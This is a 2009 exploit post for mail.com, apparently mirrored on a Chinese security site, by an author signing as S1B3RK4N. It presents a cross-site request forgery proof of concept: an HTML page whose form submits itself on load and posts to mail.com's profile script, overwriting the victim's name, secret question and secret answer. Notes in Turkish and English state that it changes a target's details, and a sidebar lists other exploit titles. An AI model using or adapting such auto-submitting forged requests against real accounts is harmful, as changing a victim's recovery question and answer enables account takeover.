Mail.com change profile cross site request forgery exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Mail.com change profile cross site request forgery exploit

来源：s1b3rk4n[at]gmail[dot]com 作者：S1B3RK4N 发布时间：2009-02-20

___________________________________________________________________________

|Site [Mail System]: http://mail.com
|
| Author: S1B3RK4N
|
| Email: s1b3rk4n[at]gmail[dot]com
|
|__________________________________________________________________________




Exploit Code :


<html><body>
<form name="profileform" method="post"
action="http://mail01.mail.com/scripts/common/profile.cgi" onSubmit="return
checkFields()">
<input name="first_name" size="30" maxlength="30" value="Isim" class="sb">
<input name="last_name" size="30" maxlength="30" value="Soyisim"
class="sb">
<input name="hint_q" size="28" maxlength="48" value="Gizli_Soru"
class="sb">
<input name="hint_a" size="28" maxlength="48" value="Gizli CEvap"
class="sb">
<script> document.forms[0].submit() </script>
</form>
</body></html>



NOT=Arkadaslar bu exploit ile hedef kisinin adini,soyadini,gizli sorusunu
ve cevabini deistirebilirsiniz....

NOTE=Hi bro's...You can change name,surname,hint question and answer with
this exploit...


_____________TurKisH PoWeR_____________

_____________StoP IsRaeL , Nomassacre_____________


________________________________________

www.CyberGrup.oRg

www.CryptoSuite.org

www.Hyper-Active.org
________________________________________

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告